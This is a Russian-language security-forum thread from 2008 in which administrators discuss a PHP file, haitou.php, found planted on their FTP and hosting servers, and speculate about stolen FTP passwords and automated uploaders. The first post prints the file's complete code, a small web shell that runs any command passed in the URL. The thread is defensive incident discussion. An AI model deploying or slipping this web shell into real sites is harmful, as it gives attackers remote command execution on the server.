Security Lab



Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти  
Форум » Взлом и защита » Уязвимости
Страницы: 1
RSS
Что есть haitou.php ?
 
#1
Это нравится:0Да/0Нет
19.02.2008 12:01:46
Обнаружил сабж в корне своего FTP-сервака. Анонимный доступ запрещен, все пароли сложные.
Создали вполне легально (т.е. логин был успешен). Код:
Код
<?php
$cmd=$_GET['cmd'];
if (isset($cmd)) {
        echo system($cmd);
    } else {
        if(ini_get('safe_mode')){
    echo "allyourbasebelongstous_";
        } else {
    echo "allyourbasebelongstous";
        }
    }
?>

т.е. обычный шелл. Заюзать его особо не заюзаешь (фтп и веб зоны разделены жостко), а вот интересно кто эту ботву "рассылает". Может автомат какой?
 
 
 
#2
Это нравится:0Да/0Нет
19.02.2008 14:22:43
хм. что тут сказать, может и не автомат просто чел думал что зальет на фтп и по http достучится.
См логи и бань нахала))
 
 
 
#3
Это нравится:0Да/0Нет
19.02.2008 16:06:36
Скорее всего программа автоматически по фтпшкам разбрасывает файлы и проверяет на доступность из веба.
Смени пароль на фтп и думай где троян словил)
 
 
 
#4
Это нравится:0Да/0Нет
19.02.2008 21:27:03
Судя по гуглу серверов с таким "подарком" не так уж и мало... Но в принципе так уж и много, чтобы говорить о вирусе или крупной бот-сети. Вероятнее всего это программа автомацизации на очень небольшом количестве компов (возможно вообще на одном). А если количество рассыльщиков невелико (иначе число инифициированных сайтов мне думается было бы побольше) то по логам с нескольких серверов возможно их вычислить.

PS/ Как мне показалось ищутся не только сервера где не разделены ftp и web зоны, но и те сервера, где разрешён метод http Put, возможно также ещё какие-то проверки на правильность настройки...
 
 
 
#5
Это нравится:0Да/0Нет
20.02.2008 15:42:23
Кста, что любопытно - все эти haitou.php были созданы в феврале 2008, так что по горячим следам...
 
 
 
#6
Это нравится:0Да/0Нет
20.02.2008 16:06:36
Попросили сайт посмотреть один - такой же файл  в корне + ифрейм через css грузит. На сайте  есть sql inj, так что скорее всего взломан был. Пароли от фтп сложные, но за сохранность я не ручаюсь, т.к. не знаю как их хранят. В гугле почти все сайты с этим файлом проифреймлены.
 
 
 
#7
Это нравится:0Да/0Нет
21.02.2008 10:51:27
Вообщем такое ощущение, что у кого-то из наших утек пароль от ФТП. От кого -- выясняю. Менять пока не могу - слишком много народа надо оповестить (это типа наш "гостевой" акк на ФТП для всех). Так что жду инцидента =)

Просто вопрос был в том, что может есть какой червячок свеженький, который тырит пароли на ФТП и выкладывает этот шелл.
 
 
 
#8
Это нравится:0Да/0Нет
04.03.2008 02:40:28
Возникает такая же проблема уже четвертый раз, два раза на своей страничке народа.ру (доступ по ftp) был запоганен index.php +haitou.php и два раза на платном хостинге!

пароли везде сложные, не повторяются.
локальная система чиста

При попытке открытия сайта в браузере:
kasper пишет что Trojan.JS
avira пишет что HTML.Infected.Webpage.Gen

вопрос: как защититься?
 
 
 
Страницы: 1
Читают тему